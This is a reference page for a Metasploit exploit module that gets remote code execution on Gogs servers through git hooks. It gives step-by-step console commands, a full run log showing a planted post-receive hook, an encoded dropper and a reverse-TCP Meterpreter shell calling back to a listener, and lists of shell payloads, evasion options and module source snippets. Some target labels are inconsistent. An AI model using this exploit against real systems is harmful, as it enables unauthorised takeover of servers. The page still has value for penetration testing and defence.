Gogs Git Hooks Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/gogs_git_hooks_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Gogs Git Hooks Remote Code Execution
Module: exploit/multi/http/gogs_git_hooks_rce
Source code: modules/exploits/multi/http/gogs_git_hooks_rce.rb
Disclosure date: 2020-10-07
Last modification time: 2021-04-16 13:08:38 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-14144, CVE-2020-15867

This module leverages an insecure setting to get remote code execution on the target OS in the context of the user running Gogs. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator. To achieve code execution, the module authenticates to the Gogs web interface, creates a temporary repository, sets a post-receive git hook with the payload and creates a dummy file in the repository. This last action will trigger the git hook and execute the payload. Everything is done through the web interface. No mitigation has been implemented so far (latest stable version is 0.12.3). This module has been tested successfully against version 0.12.3 on docker. Windows version could not be tested since the git hook feature seems to be broken.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage


msf > use exploit/multi/http/gogs_git_hooks_rce
msf exploit(gogs_git_hooks_rce) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: Username to authenticate with

  • PASSWORD: Password to use

Knowledge Base


Vulnerable Application


Description

This module leverages an insecure setting to get remote code execution on the target OS in the context of the user running Gogs. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator.

To achieve code execution, the module authenticates to the Gogs web interface, creates a temporary repository, sets a post-receive git hook with the payload and creates a dummy file in the repository. This last action will trigger the git hook and execute the payload. Everything is done through the web interface.

No mitigation has been implemented so far (latest stable version is 0.12.3).

This module has been tested successfully against version 0.12.3 on Docker. Windows version could not be tested since the git hook feature seems to be broken.

Setup

Follow the installation steps: - With Docker: https://github.com/gogs/gogs/tree/main/docker - From binary: https://gogs.io/docs/installation/install_from_binary - From package: https://gogs.io/docs/installation/install_from_packages

Verification Steps


  1. Install the application (follow Setup)
  2. Start msfconsole
  3. Do: use multi/http/gogs_git_hooks_rce
  4. Do: set USERNAME <username>
  5. Do: set PASSWORD <password>
  6. Do: set rhosts <ip>
  7. Do: set rport <port>
  8. Do: set lhost <ip>
  9. Do: set target <target #>
  10. Do: run
  11. You should get session.

Targets


0 (Unix Command)

This executes a Unix command.

1 (Linux Dropper)

This uses a Linux dropper to execute code.

0 (Unix Command)

This executes a Windows command.

1 (Linux Dropper)

This uses a Windows dropper to execute code.

Options


TARGETURI

The base path of the Gitea application, which is set to / by default.

USERNAME

The username to authenticate with.

PASSWORD

The password to authenticate with.

Scenarios


Gogs 0.12.3 on Docker

msf6 > use multi/http/gogs_git_hooks_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gogs_git_hooks_rce) > set USERNAME msfuser
USERNAME => msfuser
msf6 exploit(multi/http/gogs_git_hooks_rce) > set PASSWORD Msf!23
PASSWORD => Msf!23
msf6 exploit(multi/http/gogs_git_hooks_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/gogs_git_hooks_rce) > set RPORT 10080
RPORT => 10080
msf6 exploit(multi/http/gogs_git_hooks_rce) > set LHOST 192.168.1.75
LHOST => 192.168.1.75
msf6 exploit(multi/http/gogs_git_hooks_rce) > options

Module options (exploit/multi/http/gogs_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Msf!23           yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      10080            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   msfuser          yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.75     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gogs_git_hooks_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/gogs_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.1.75:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gogs found
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "msfuser/Msf!23"
[*] Get "csrf" value
[+] csrf=RDAhjRw_I0Uf85CuY4_SBFjbO1A6MTYxNzIwMDUzNjMzNjg2NjEwMA
[+] Logged in
[*] Create repository "Sonsing_Duobam"
[*] Get "csrf" and "user_id" values
[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
[+] user_id=1
[+] Repository created
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAA...
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAA...
[*] Setup post-receive hook with command
[*] Get "csrf" value
[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[*] Get "csrf" and "last_commit" values
[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
[+] last_commit=f8bbde6c14b8bbe92edfc802812a24be30e3fdbb
[*] qJcA.txt created
[+] File created, shell incoming...
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.1.75
[*] Meterpreter session 1 opened (192.168.1.75:4444 -> 192.168.1.75:61502) at 2021-03-31 16:22:20 +0200
[*] Cleaning up
[*] Get "csrf" value
[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
[*] Repository Sonsing_Duobam deleted.

meterpreter > getuid
Server username: git @ 4f1193a0be31 (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           :  (Linux 4.19.121-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Go back to menu.

Msfconsole Usage


Here is how the multi/http/gogs_git_hooks_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/gogs_git_hooks_rce

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gogs_git_hooks_rce) > show info

       Name: Gogs Git Hooks Remote Code Execution
     Module: exploit/multi/http/gogs_git_hooks_rce
   Platform: Unix, Linux, Windows
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-10-07

Provided by:
  Podalirius
  Christophe De La Fuente

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper
  2   Windows Command
  3   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Password to use
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      3000             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME                    yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module leverages an insecure setting to get remote code 
  execution on the target OS in the context of the user running Gogs. 
  This is possible when the current user is allowed to create `git 
  hooks`, which is the default for administrative users. For 
  non-administrative users, the permission needs to be specifically 
  granted by an administrator. To achieve code execution, the module 
  authenticates to the Gogs web interface, creates a temporary 
  repository, sets a `post-receive` git hook with the payload and 
  creates a dummy file in the repository. This last action will 
  trigger the git hook and execute the payload. Everything is done 
  through the web interface. No mitigation has been implemented so far 
  (latest stable version is 0.12.3). This module has been tested 
  successfully against version 0.12.3 on docker. Windows version could 
  not be tested since the git hook feature seems to be broken.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-15867
  https://www.exploit-db.com/exploits/49571
  https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
  https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/

Module Options


This is a complete list of options available in the multi/http/gogs_git_hooks_rce exploit:

msf6 exploit(multi/http/gogs_git_hooks_rce) > show options

Module options (exploit/multi/http/gogs_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Advanced Options


Here is a complete list of advanced options supported by the multi/http/gogs_git_hooks_rce exploit:

msf6 exploit(multi/http/gogs_git_hooks_rce) > show advanced

Module advanced options (exploit/multi/http/gogs_git_hooks_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       bourne                                              no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_i
                                                                                         nvokewebrequest)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                30                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/gogs_git_hooks_rce module can exploit:

msf6 exploit(multi/http/gogs_git_hooks_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper
   2   Windows Command
   3   Windows Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/gogs_git_hooks_rce exploit:

msf6 exploit(multi/http/gogs_git_hooks_rce) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   12  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   13  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   14  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   15  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   16  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   17  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   18  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   19  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   20  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   21  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   24  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   25  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   26  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   27  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   28  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   32  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   33  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   34  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   35  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   36  payload/linux/x86/read_file                                        normal  No     Linux Read File
   37  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   38  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   39  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   40  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   41  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   42  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   43  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   47  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   48  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   49  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   50  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/gogs_git_hooks_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/gogs_git_hooks_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target did not respond to check.


Here is a relevant code snippet related to the "Target did not respond to check." error message:

123:	      'method' => 'GET',
124:	      'uri' => normalize_uri(target_uri.path),
125:	      'keep_cookies' => true
126:	    )
127:	    unless res
128:	      return CheckCode::Unknown('Target did not respond to check.')
129:	    end
130:	
131:	    # <meta name="author" content="Gogs" />
132:	    unless res.body.match(%r{<meta +name="author" +content="Gogs" */>})
133:	      return CheckCode::Unsupported('Target does not appear to be running Gogs.')

Target does not appear to be running Gogs.


Here is a relevant code snippet related to the "Target does not appear to be running Gogs." error message:

128:	      return CheckCode::Unknown('Target did not respond to check.')
129:	    end
130:	
131:	    # <meta name="author" content="Gogs" />
132:	    unless res.body.match(%r{<meta +name="author" +content="Gogs" */>})
133:	      return CheckCode::Unsupported('Target does not appear to be running Gogs.')
134:	    end
135:	
136:	    CheckCode::Appears('Gogs found')
137:	  end
138:	

Gogs found


Here is a relevant code snippet related to the "Gogs found" error message:

131:	    # <meta name="author" content="Gogs" />
132:	    unless res.body.match(%r{<meta +name="author" +content="Gogs" */>})
133:	      return CheckCode::Unsupported('Target does not appear to be running Gogs.')
134:	    end
135:	
136:	    CheckCode::Appears('Gogs found')
137:	  end
138:	
139:	  def exploit
140:	    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
141:	

Unable to get the CSRF token


Here is a relevant code snippet related to the "Unable to get the CSRF token" error message:

191:	      'method' => 'GET',
192:	      'uri' => normalize_uri(uri),
193:	      'keep_cookies' => true
194:	    )
195:	    unless res
196:	      fail_with(Failure::Unreachable, 'Unable to get the CSRF token')
197:	    end
198:	
199:	    csrf = extract_value(res, '_csrf')
200:	    vprint_good("csrf=#{csrf}")
201:	    csrf

"<ATTR>" not found in response


Here is a relevant code snippet related to the ""<ATTR>" not found in response" error message:

204:	  def extract_value(res, attr)
205:	    # <input type="hidden" name="_csrf" value="Ix7E3_U_lOt-kZfeMjEll57hZuU6MTYxNzAyMzQwOTEzMjU1MDUwMA">
206:	    # <input type="hidden" id="user_id" name="user_id" value="1" required>
207:	    # <input type="hidden" name="last_commit" value="6a7eb84e9a8e4e76a93ea3aec67b2f70fe2518d2">
208:	    unless (match = res.body.match(/<input .*name="#{attr}" +value="(?<value>[^"]+)".*>/))
209:	      return fail_with(Failure::NotFound, "\"#{attr}\" not found in response")
210:	    end
211:	
212:	    return match[:value]
213:	  end
214:	

Unable to reach the login page


Here is a relevant code snippet related to the "Unable to reach the login page" error message:

217:	      '/user/login',
218:	      user_name: datastore['USERNAME'],
219:	      password: datastore['PASSWORD']
220:	    )
221:	    unless res
222:	      fail_with(Failure::Unreachable, 'Unable to reach the login page')
223:	    end
224:	
225:	    unless res.code == 302
226:	      fail_with(Failure::NoAccess, 'Login failed')
227:	    end

Login failed


Here is a relevant code snippet related to the "Login failed" error message:

221:	    unless res
222:	      fail_with(Failure::Unreachable, 'Unable to reach the login page')
223:	    end
224:	
225:	    unless res.code == 302
226:	      fail_with(Failure::NoAccess, 'Login failed')
227:	    end
228:	
229:	    nil
230:	  end
231:	

Unable to reach <URI>


Here is a relevant code snippet related to the "Unable to reach <URI>" error message:

232:	  def gogs_create_repo
233:	    uri = normalize_uri(datastore['TARGETURI'], '/repo/create')
234:	
235:	    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)
236:	    unless res
237:	      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
238:	    end
239:	
240:	    vprint_status('Get "csrf" and "user_id" values')
241:	    csrf = extract_value(res, '_csrf')
242:	    vprint_good("csrf=#{csrf}")

Unable to reach <URI>


Here is a relevant code snippet related to the "Unable to reach <URI>" error message:

254:	      readme: 'Default',
255:	      auto_init: 'on',
256:	      csrf: csrf
257:	    )
258:	    unless res
259:	      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
260:	    end
261:	
262:	    unless res.code == 302
263:	      fail_with(Failure::UnexpectedReply, 'Create repository failure')
264:	    end

Create repository failure


Here is a relevant code snippet related to the "Create repository failure" error message:

258:	    unless res
259:	      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
260:	    end
261:	
262:	    unless res.code == 302
263:	      fail_with(Failure::UnexpectedReply, 'Create repository failure')
264:	    end
265:	
266:	    nil
267:	  end
268:	

Unable to reach <URI>


Here is a relevant code snippet related to the "Unable to reach <URI>" error message:

274:	      exit 0
